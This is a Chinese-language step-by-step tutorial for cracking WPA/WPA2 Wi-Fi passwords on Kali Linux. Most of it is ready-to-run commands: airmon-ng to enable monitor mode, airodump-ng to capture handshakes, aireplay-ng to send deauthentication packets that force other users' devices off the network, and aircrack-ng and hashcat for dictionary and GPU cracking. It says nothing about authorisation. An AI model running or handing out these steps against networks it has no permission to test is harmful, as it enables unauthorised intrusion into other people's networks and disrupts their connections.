Kali linux 使用Aircrack破解wifi密碼（wpa/wpa2）

要求：

安裝有Kali Linux的計算機 支援監控模式的網絡卡，膝上型電腦一般都支援 字典檔案 時間和耐心

這種攻擊需要字典檔案，一個好的字典至關重要。我以Kali Linux自帶的rockyou字典為例，位於/user/share/wordlists/rockyou.txt.gz。

使用前先解壓：

# gzip -d /usr/share/wordlists/rockyou.txt.gz

1）首先斷開連線的wifi。

在終端中執行：

# airmon-ng

上面命令列出了支援監控模式的無線網絡卡。如果沒有任何輸出，表示無線網絡卡不支援監控模式。你可以看到我的wlan0支援監控模式。

2）開啟無線網絡卡的監控模式

# airmon-ng start wlan0

執行成功之後網絡卡介面變為wlan0mon；可以使用ifconfig命令檢視。

3）檢視wifi網路

# airodump-ng wlan0mon

上面列出了周圍的wifi和它們的詳細資訊，包括訊號強度、加密型別、頻道等。要記住要破解wifi的頻道號和BSSID。

按Ctrl-C結束。

4）抓取握手包

使用網絡卡的監聽模式抓取周圍的無線網路資料包。其中，對我們最重要的資料包是：包含密碼的包－也叫握手包。當有新使用者或斷開使用者自動連線wifi時，會發送握手包。

開始抓包：

# airodump-ng -c 6 --bssid C8:3A:35:30:3E:C8 -w ~/ wlan0mon

引數解釋：

-c指定頻道號 –bssid指定路由器bssid -w指定抓取的資料包儲存位置

5）強制連線到wifi的裝置重新連線路由器

現在我們只要等使用者連線/重連線wifi了，運氣不好也許要很長時間。

但是我們是不會等的，這不是耐心黑客該乾的事。有一個叫aireplay-ng的工具，它可以強制使用者斷開wifi連線；原理是，給連線到wifi的一個裝置傳送一個deauth（反認證）包，讓那個裝置斷開wifi，隨後它自然會再次連線wifi。

aireplay-ng的生效前提是，wifi網路中至少有一個連線的裝置。從上圖(4)可以看到哪些裝置連線到了wifi，STATION就是連線裝置的MAC地址，記住一個。

開啟新終端執行：

# aireplay-ng -0 2 -a C8:3A:35:30:3E:C8 -c B8:E8:56:09:CC:9C wlan0mon

引數解釋：

-0指定傳送反認證包的個數 -a指定無線路由器BSSID -c指定強制斷開的裝置

如果成功：

按Ctrl-C結束抓包。

我們已經得到了想要的握手包了，可以結束無線網絡卡的監控模式了：

# airmon-ng stop wlan0mon

6) 開始破解密碼

# aircrack-ng -a2 -b C8:3A:35:30:3E:C8 -w /usr/share/wordlists/rockyou.txt ~/*.cap

引數解釋：

-a2代表WPA的握手包 -b指定要破解的wifi BSSID。 -w指定字典檔案 最後是抓取的包

可選）使用顯示卡的運算能力

如果你有一個強大的GPU，為什麼不使用GPU跑字典呢？

Hashcat可以藉助GPU的運算力破解各種不同演算法的hash值。

下載時要注意選擇正確的顯示卡型別（AMD、NVidia）。

在破解cap檔案之前，要把它轉換為hccap檔案：

# aircrack-ng file.cap -J out.hccap

使用GPU破解hash：

# oclHashcat.bin -m 2500 out.hccap 字典檔案